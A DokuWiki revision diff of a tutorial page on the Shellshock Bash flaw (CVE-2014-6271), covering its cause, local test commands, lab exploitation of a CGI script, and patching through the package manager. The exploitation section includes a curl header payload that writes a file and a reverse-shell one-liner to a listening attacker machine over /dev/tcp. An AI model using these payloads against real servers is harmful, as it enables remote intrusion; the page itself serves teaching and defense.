Wiki

User Tools

Site Tools

Trace: sabnzbd
bash:shellshock

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
bash:shellshock [2016/07/03 17:47] peterbash:shellshock [2020/07/15 09:30] (current) – external edit 127.0.0.1
Line 1: Line 1:
-====== Bash - Shellshock ======+====== BASH - Shellshock ======
  
 The Shellshock bug allows someone to remotely execute arbitrary code on systems that uses Bash. The Shellshock bug allows someone to remotely execute arbitrary code on systems that uses Bash.
Line 6: Line 6:
  
 The Bash flaw – designated CVE-2014-6271 [http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271] – is being exploited in the wild against web servers, which are the most obvious targets but not by any means the only machines at risk. The Bash flaw – designated CVE-2014-6271 [http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271] – is being exploited in the wild against web servers, which are the most obvious targets but not by any means the only machines at risk.
 +
 +----
  
 ===== Main Reason ===== ===== Main Reason =====
Line 17: Line 19:
 Whether these computers are actually vulnerable depends on whether they invoke Bash in an unsafe way.  We already know that this is true of many web servers, and it’s believed that other types of network services could also be vulnerable. But it’ll take a while for security experts to audit various pieces of software to check for vulnerabilities. Whether these computers are actually vulnerable depends on whether they invoke Bash in an unsafe way.  We already know that this is true of many web servers, and it’s believed that other types of network services could also be vulnerable. But it’ll take a while for security experts to audit various pieces of software to check for vulnerabilities.
  
 +----
    
 ===== Finding the Bug ===== ===== Finding the Bug =====
Line 26: Line 29:
 </code> </code>
    
 +or
 +
 +<code bash>
 +env 'VAR=() { :;}; echo vulnerable!' 'FUNCTION()=() { :;}; echo vulnerable!' bash -c "echo hello"
 +</code>
 +
 If you are vulnerable it will return: If you are vulnerable it will return:
  
Line 39: Line 48:
 </code> </code>
  
 +----
  
 ===== Remote Code Execution Through Bash ===== ===== Remote Code Execution Through Bash =====
Line 46: Line 55:
  
 Below I explained with simple example of remote code execution through vulnerable bash. Below I explained with simple example of remote code execution through vulnerable bash.
- 
-<code> 
-rm -fr /tmp/sathish 
-</code> 
  
 I already have a working Apache web server with **mod_cgi** enabled and with a simple bash script to echo “CGI Bash Bug Example” and size of root filesystem. I already have a working Apache web server with **mod_cgi** enabled and with a simple bash script to echo “CGI Bash Bug Example” and size of root filesystem.
  
 <code bash> <code bash>
-#cat /usr/lib/cgi-bin/bashbug.sh+cat /usr/lib/cgi-bin/bashbug.sh
 </code> </code>
  
Line 66: Line 71:
 echo `df -h / | grep -v Filesystem` echo `df -h / | grep -v Filesystem`
 </file> </file>
 +
 +Test it:
  
 <code> <code>
-#curl -k -H ‘User-Agent: () { :;}; echo BugFound>/tmp/sathish’ https://localhost/cgi-bin/bashbug.sh+Delete the tmp file if is exists from a previous run. 
 +rm -fr /tmp/tmpoutput
  
-#tail -n1 /var/log/apache2/access.log+Access the website, which runs the CGI script. 
 +curl -k -H ‘User-Agent: () { :;}; echo BugFound>/tmp/tmpoutput’ https://localhost/cgi-bin/bashbug.sh
  
-#ls -l /tmp/sathish+Check the web server logs. 
 +tail -n1 /var/log/apache2/access.log 
 + 
 +# Check the output. 
 +ls -l /tmp/tmpoutput
 </code> </code>
 +
 +
 +So you have a cgi file named “bashbug” that does nothing but respond with “CGI bug found”.  If you call it using curl with a malicious user agent header, bash stores that header in an environment variable, but due to the bug, the code gets executed which creates the file “/tmp/tmpoutput”.
 +
 +
 +----
 +
 +==== Example 2:  Getting a reverse tcp connection from target system using /dev/tcp connection. ====
 +
 +
 +In this example I had two machines, one is  Kali Linux  – 192.168.31.20  and  Ubuntu 14.04  – 192.168.31.5 ( Shellshock ).
 +
 +From my Kali Linux machine i executed the remote command on the target Ubuntu system to create a TCP connection on port 4444 and then listen on port 4444 in my local machine using netcat.
 +
 +<code>
 +root@kali# nc -lvp 4444
 +
 +root@kali#  curl  -H  ‘x: () { :;};  /bin/bash  -i  >&  /dev/tcp/192.168.31.20/4444  0>&1’   http://192.168.31.5/cgi-bin/bashbug.sh
 +</code>
 +
 +That’s it we successfully got the reverse connection of www-data user from the bash vulnerable system.
 +
 +----
 +
 +===== Test Remote Sites =====
 +
 +If you simply want to test if websites or specific CGI scripts are vulnerable, use this link:
 +
 +http://shellshock.brandonpotter.com/
 +
 +
 +----
 +
 +===== Fix the Vulnerability =====
 +
 +The easiest way to fix the vulnerability is to use your default package manager to update the version of Bash.
 +
 +<code bash>
 +sudo apt-get update && sudo apt-get install --only-upgrade bash
 +</code>
 +
 +----
 +
 +===== End of Life Ubuntu / Debian Releases =====
 +
 +If you are running a release of Ubuntu / Debian that is considered end of life status, you will have to upgrade to a supported to use the package manager to update Bash.  The following command can be used to upgrade to a new release (it is recommended that you back up your server and important data first, in case you run into any issues):
 +
 +<code bash>
 +sudo do-release-upgrade
 +</code>
 +
 +After the upgrade is complete, ensure that you update Bash.
 +
bash/shellshock.1467568020.txt.gz · Last modified: 2020/07/15 09:30 (external edit)
Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki